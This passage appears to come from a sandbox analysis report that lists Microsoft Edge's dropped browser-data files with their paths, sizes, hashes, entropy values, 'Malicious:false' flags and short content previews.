                                                                                                                                                                                                                                                                          SHA-256:FCC2896BB6D85F8129094652EF9B9759519571C8A2B5390F092A9E1F52871C46
                                                                                                                                                                                                                                                                          SHA-512:DE0972BC952978E5596582FCF4DD5CBFAE6B7881DB1E774EC3E676A962A38975D00BD29014461B1203642D931EFAE932FCE5564D9262F2F260695ED5E3D1ACB8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:05.260 138c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/27-01:11:05.261 138c Recovering log #3.2024/12/27-01:11:05.261 138c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):346
                                                                                                                                                                                                                                                                          Entropy (8bit):5.18872718047005
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BGzM+q2PN723oH+TcwtfrzAdIFUt8UGlNXZmw+UGlNqMVkwON723oH+TcwtfrzId:B4M+vVaYeb9FUt8UO/+UxMV5OaYeb2J
                                                                                                                                                                                                                                                                          MD5:81CF18BFC18610405013FC004B0E036C
                                                                                                                                                                                                                                                                          SHA1:D3BB054452BD20F33873F9697743329711FE8B2F
                                                                                                                                                                                                                                                                          SHA-256:FCC2896BB6D85F8129094652EF9B9759519571C8A2B5390F092A9E1F52871C46
                                                                                                                                                                                                                                                                          SHA-512:DE0972BC952978E5596582FCF4DD5CBFAE6B7881DB1E774EC3E676A962A38975D00BD29014461B1203642D931EFAE932FCE5564D9262F2F260695ED5E3D1ACB8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:05.260 138c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/27-01:11:05.261 138c Recovering log #3.2024/12/27-01:11:05.261 138c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):120
                                                                                                                                                                                                                                                                          Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                          MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                          SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                          SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                          SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):13
                                                                                                                                                                                                                                                                          Entropy (8bit):2.6612262562697895
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:NYLFRQZ:ap2Z
                                                                                                                                                                                                                                                                          MD5:B64BD80D877645C2DD14265B1A856F8A
                                                                                                                                                                                                                                                                          SHA1:F7379E1A6F8CE062E891C56736C789C7EA77CD6A
                                                                                                                                                                                                                                                                          SHA-256:83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
                                                                                                                                                                                                                                                                          SHA-512:734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:117.0.2045.55

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):44455
                                                                                                                                                                                                                                                                          Entropy (8bit):6.089825674951637
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWbdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn5AkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                          MD5:CC806F2E23F09AA6023A2E5346F5B3B5
                                                                                                                                                                                                                                                                          SHA1:FF9F9E726EB80F676D3FE243EBFAC5DBD48E6789
                                                                                                                                                                                                                                                                          SHA-256:23A9578985A4B4D7049112177BD6B5F7174EE3B51268E6DED5CADAB3E1BDCF1D
                                                                                                                                                                                                                                                                          SHA-512:2A2BD2253545A7E815CCE2AD78E955B78532BDC0A7632864310D61E78BE6766ECF1FDD599D51AEFF124BBFA2603A63F6D3D95521BCD2CBFCC8CFCB84CA8B67EC
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF50c4c.TMP (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):44455
                                                                                                                                                                                                                                                                          Entropy (8bit):6.089825674951637
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWbdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn5AkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                          MD5:CC806F2E23F09AA6023A2E5346F5B3B5
                                                                                                                                                                                                                                                                          SHA1:FF9F9E726EB80F676D3FE243EBFAC5DBD48E6789
                                                                                                                                                                                                                                                                          SHA-256:23A9578985A4B4D7049112177BD6B5F7174EE3B51268E6DED5CADAB3E1BDCF1D
                                                                                                                                                                                                                                                                          SHA-512:2A2BD2253545A7E815CCE2AD78E955B78532BDC0A7632864310D61E78BE6766ECF1FDD599D51AEFF124BBFA2603A63F6D3D95521BCD2CBFCC8CFCB84CA8B67EC
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF50cb9.TMP (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):44455
                                                                                                                                                                                                                                                                          Entropy (8bit):6.089825674951637
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWbdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn5AkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                          MD5:CC806F2E23F09AA6023A2E5346F5B3B5
                                                                                                                                                                                                                                                                          SHA1:FF9F9E726EB80F676D3FE243EBFAC5DBD48E6789
                                                                                                                                                                                                                                                                          SHA-256:23A9578985A4B4D7049112177BD6B5F7174EE3B51268E6DED5CADAB3E1BDCF1D
                                                                                                                                                                                                                                                                          SHA-512:2A2BD2253545A7E815CCE2AD78E955B78532BDC0A7632864310D61E78BE6766ECF1FDD599D51AEFF124BBFA2603A63F6D3D95521BCD2CBFCC8CFCB84CA8B67EC
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF50f0b.TMP (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):44455
                                                                                                                                                                                                                                                                          Entropy (8bit):6.089825674951637
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWbdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn5AkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                          MD5:CC806F2E23F09AA6023A2E5346F5B3B5
                                                                                                                                                                                                                                                                          SHA1:FF9F9E726EB80F676D3FE243EBFAC5DBD48E6789
                                                                                                                                                                                                                                                                          SHA-256:23A9578985A4B4D7049112177BD6B5F7174EE3B51268E6DED5CADAB3E1BDCF1D
                                                                                                                                                                                                                                                                          SHA-512:2A2BD2253545A7E815CCE2AD78E955B78532BDC0A7632864310D61E78BE6766ECF1FDD599D51AEFF124BBFA2603A63F6D3D95521BCD2CBFCC8CFCB84CA8B67EC
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):47
                                                                                                                                                                                                                                                                          Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                          MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                          SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                          SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                          SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):35
                                                                                                                                                                                                                                                                          Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                          MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                          SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                          SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                          SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):50
                                                                                                                                                                                                                                                                          Entropy (8bit):3.9904355005135823
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:0xXF/XctY5GUf+:0RFeUf+
                                                                                                                                                                                                                                                                          MD5:E144AFBFB9EE10479AE2A9437D3FC9CA
                                                                                                                                                                                                                                                                          SHA1:5AAAC173107C688C06944D746394C21535B0514B
                                                                                                                                                                                                                                                                          SHA-256:EB28E8ED7C014F211BD81308853F407DF86AEBB5F80F8E4640C608CD772544C2
                                                                                                                                                                                                                                                                          SHA-512:837D15B3477C95D2D71391D677463A497D8D9FFBD7EB42E412DA262C9B5C82F22CE4338A0BEAA22C81A06ECA2DF7A9A98B7D61ECACE5F087912FD9BA7914AF3F
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):575056
                                                                                                                                                                                                                                                                          Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                          MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                          SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                          SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                          SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):9
                                                                                                                                                                                                                                                                          Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                          MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                          SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                          SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                          SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:uriCache_

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):179
                                                                                                                                                                                                                                                                          Entropy (8bit):5.017655778471233
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclQeTli:YWLSGTt1o9LuLgfGBPAzkVj/T8lQgi
                                                                                                                                                                                                                                                                          MD5:99BBB869F35EE46C2504A0E8FC8EC523
                                                                                                                                                                                                                                                                          SHA1:7CAE976F813195E74BEE5C6B05A91EEBA14E358A
                                                                                                                                                                                                                                                                          SHA-256:E3F377BC9A736C79C992CB90C5C98319493998345B836786504CFE66D0CD97E5
                                                                                                                                                                                                                                                                          SHA-512:977064B67349FB4C791ABF17A1A79A4BBFC336A41524EA204A02ED466FAAF30AD46F68F50A91BDCB1F71EB133C032C538AC37A330C2DD4BA1CE9A620777ED1F5
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1735380669750232}]}

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):86
                                                                                                                                                                                                                                                                          Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                                                                          MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                                                                                                          SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                                                                                                          SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                                                                                                          SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\eae121b3-9912-4b44-bc23-c322546a89c0.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):44894
                                                                                                                                                                                                                                                                          Entropy (8bit):6.095147494967383
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWJji1zNtiATNfsUrtE3PF5DKJDSgzMMd6qD47u3+CO:+/Ps+wsI7ynku4KtSmd6qE7lFoC
                                                                                                                                                                                                                                                                          MD5:D93804E0EF24300DB595C46CC2AE72EF
                                                                                                                                                                                                                                                                          SHA1:6A151B2108CA5A8F220BE9BC98EE0087BD634539
                                                                                                                                                                                                                                                                          SHA-256:914D6AFBCA213374B024480FF2E538DADE20E6ED1231A0C89CA2F7E6D4936944
                                                                                                                                                                                                                                                                          SHA-512:49E7CB7D78421093157802FF539D813E6D7B819BDDA6F6AB8A363C18E496D70F0C36110A5E6A8C98611D82CD20D05447CDF6D196444FDCC7C8185AC993A39E71
                                                                                                                                                                                                                                                                          Malicious:false
